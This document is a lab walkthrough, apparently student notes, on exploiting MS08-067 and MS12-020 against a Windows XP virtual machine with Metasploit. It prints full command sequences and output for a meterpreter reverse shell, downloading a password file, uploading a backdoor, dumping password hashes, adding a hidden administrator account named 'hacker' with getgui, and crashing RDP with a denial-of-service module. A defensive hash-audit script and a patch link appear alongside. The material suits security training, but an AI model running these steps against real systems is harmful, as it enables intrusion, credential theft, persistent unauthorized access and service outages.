
*** Exploiting vulnerability MS08-067 ***

1. Preparation
- Kali Linux virtual machine:
+ IP: 192.168.1.225
- Windows XP virtual machine:
+ IP: 192.168.1.226
+ Create a shared folder on the XP machine
There are 4 main steps:
first: use exploit -> set payload (this creates the backdoor)
then we set LHOST and RHOST
2. Exploiting MS08-067 from the Kali Linux machine
- Start Metasploit
root@kali:~# msfconsole
msf > search ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.226    <- the victim machine
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.225    <- the attacking machine
msf exploit(ms08_067_netapi) > set target 6
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.225:4444
[*] Attempting to trigger the vulnerability...
[*] Sending stage (882688 bytes) to 192.168.1.226
[*] Meterpreter session 1 opened (192.168.1.225:4444 -> 192.168.1.226:1045) at 2015-05-29 03:07:05 -0700
meterpreter >
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd C:\\
meterpreter > pwd
C:\
meterpreter > dir
[-] Unknown command: dir.
meterpreter > ls
Listing: C:\
============
Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
100777/rwxrwxrwx  0          fil   2011-06-22 21:45:05 -0700  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   2011-06-22 21:45:05 -0700  CONFIG.SYS
40777/rwxrwxrwx   0          dir   2011-06-22 21:51:32 -0700  Documents and Settings
100444/r--r--r--  0          fil   2011-06-22 21:45:05 -0700  IO.SYS
100444/r--r--r--  0          fil   2011-06-22 21:45:05 -0700  MSDOS.SYS
100555/r-xr-xr-x  47564      fil   2004-08-03 14:38:34 -0700  NTDETECT.COM
40555/r-xr-xr-x   0          dir   2011-06-22 21:54:29 -0700  Program Files
40777/rwxrwxrwx   0          dir   2015-05-29 18:22:02 -0700  RECYCLER
40777/rwxrwxrwx   0          dir   2015-05-29 18:22:21 -0700  Shared
40777/rwxrwxrwx   0          dir   2011-06-22 21:50:55 -0700  System Volume Information
40777/rwxrwxrwx   0          dir   2015-05-29 19:06:01 -0700  WINDOWS
100666/rw-rw-rw-  211        fil   2011-06-22 21:41:17 -0700  boot.ini
100444/r--r--r--  250032     fil   2004-08-03 14:59:34 -0700  ntldr
100666/rw-rw-rw-  805306368  fil   2015-05-29 20:32:45 -0700  pagefile.sys
100666/rw-rw-rw-  9          fil   2015-05-29 20:35:48 -0700  password.txt
meterpreter > download password.txt /root/Desktop
[*] downloading: password.txt -> /root/Desktop/password.txt
[*] download   : password.txt -> /root/Desktop/password.txt
meterpreter > upload /root/Desktop/backdoor.txt C:\\
[*] uploading  : /root/Desktop/backdoor.txt -> C:\
[*] uploaded   : /root/Desktop/backdoor.txt -> C:\\backdoor.txt
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:8c025be98d381e3af487c93fef80aadb:978d04d45dfc721a1dbeae72cc15dda1:::
nhanld:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:7135596c4b66eb319e25b73a52c3eaf4:::
meterpreter > run getgui
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u <username> -p <password>
Or: getgui -e
OPTIONS:
    -e        Enable RDP only.
    -f <opt>  Forward RDP Connection.
    -h        Help menu.
    -p <opt>  The Password of the user to add.
    -u <opt>  The Username of the user to add.
meterpreter > run getgui -u hacker -p 123abc!!! -f
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] Adding User: hacker with Password: 123abc!!!
[*] Hiding user from Windows Login screen
[*] Adding User: hacker to local group 'Remote Desktop Users'
[*] Adding User: hacker to local group 'Administrators'
[*] You can now login with the created user
[*] Starting the port forwarding at local port
[-] You must supply a local port, remote host, and remote port.
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150529.4311.rc
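The hashdump output above shows exactly what an attacker sees once the box is owned; the same data is what a defender should be auditing before that happens. The script below is an added example (not part of the original lab, and not a Metasploit tool): it parses pwdump-format lines like the ones printed by hashdump and flags the weaknesses visible in this dump. The two constants are well-known values: aad3b435b51404eeaad3b435b51404ee is the LM hash of the empty password (it also appears when LM hashes are simply not stored), and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty password, so any account carrying it has a blank password. The sample input is copied from the dump on this page.

```python
import re
from collections import namedtuple

# Well-known hashes of the empty password (general Windows facts, not page-specific).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM of "" or "LM hash not stored"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT of "" -> blank password

# pwdump line format: user:RID:LMhash:NThash:::
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

Account = namedtuple("Account", "user rid lm nt")

# Sample input: the hashdump output shown on this page.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:8c025be98d381e3af487c93fef80aadb:978d04d45dfc721a1dbeae72cc15dda1:::
nhanld:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:7135596c4b66eb319e25b73a52c3eaf4:::
"""


def parse_pwdump(text):
    """Parse pwdump/hashdump lines into Account tuples; lines that do not
    match the format (prompts, status lines) are skipped."""
    accounts = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if not m:
            continue
        user, rid, lm, nt = m.groups()
        accounts.append(Account(user, int(rid), lm.lower(), nt.lower()))
    return accounts


def audit(accounts):
    """Return (user, finding) pairs for the weaknesses a dump reveals:
    blank passwords, LM hashes still being stored, and password reuse
    (two accounts with the same non-empty NT hash)."""
    findings = []
    seen_nt = {}  # NT hash -> first user seen with it
    for a in accounts:
        if a.nt == EMPTY_NT:
            findings.append((a.user, "blank password"))
        elif a.nt in seen_nt:
            findings.append((a.user, "same password as " + seen_nt[a.nt]))
        else:
            seen_nt[a.nt] = a.user
        if a.lm != EMPTY_LM:
            # A real LM hash means NoLMHash is off; LM is trivially crackable.
            findings.append((a.user, "LM hash stored"))
    return findings


if __name__ == "__main__":
    for user, finding in audit(parse_pwdump(SAMPLE_HASHDUMP)):
        print(f"{user:20s} {finding}")
```

On the dump from this page the audit reports blank passwords for Administrator, Guest and nhanld, and an LM hash still stored for HelpAssistant; SUPPORT_388945a0 is clean. Any of the three blank-password accounts is enough for an attacker to skip cracking entirely, and a blank built-in Administrator (RID 500) on an unpatched SMB service is the worst case.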

*** Exploiting vulnerability MS12-020 ***


- If the computer has vulnerability "ms12-020":
=> ms12: a bulletin from the year 2012
020: the 20th bulletin of 2012
- Fix it by downloading the "ms12-020" patch
=> search Google for "ms12-020 KB"
=> https://support.microsoft.com/en-us/kb/2671387
- Exploiting ms12-020
=> if the exploit succeeds, the XP machine may "restart" or show a "blue screen"
root@kali:~# msfconsole
msf > search ms12-020
Matching Modules
================

   Name                                              Disclosure Date  Rank    Description
   ----                                              ---------------  ----    -----------
   auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  MS12-020 Microsoft Remote Desktop Use-After-Free DoS
   auxiliary/scanner/rdp/ms12_020_check                               normal  MS12-020 Microsoft Remote Desktop Checker

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
=> select the ms12-020 module to attack a given PC
msf auxiliary(ms12_020_maxchannelids) > show options
Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3389             yes       The target port

msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.1.226
=> set RHOST to the IP of the XP machine
msf auxiliary(ms12_020_maxchannelids) > exploit
=> run the exploit against the XP machine
[*] 192.168.1.226:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.1.226:3389 - 210 bytes sent
[*] 192.168.1.226:3389 - Checking RDP status...
[+] 192.168.1.226:3389 seems down
[*] Auxiliary module execution completed
Notes:
RHOST: remote Host -> IP of the XP machine (the victim)
RPORT: remote Port -> port of the application we are attacking
LHOST: local Host -> IP of the Kali Linux machine
LPORT: local Port -> a port available in the Metasploit program
SRVHOST: used to bring up a fake server -> SRVHOST is the IP of the Kali Linux machine
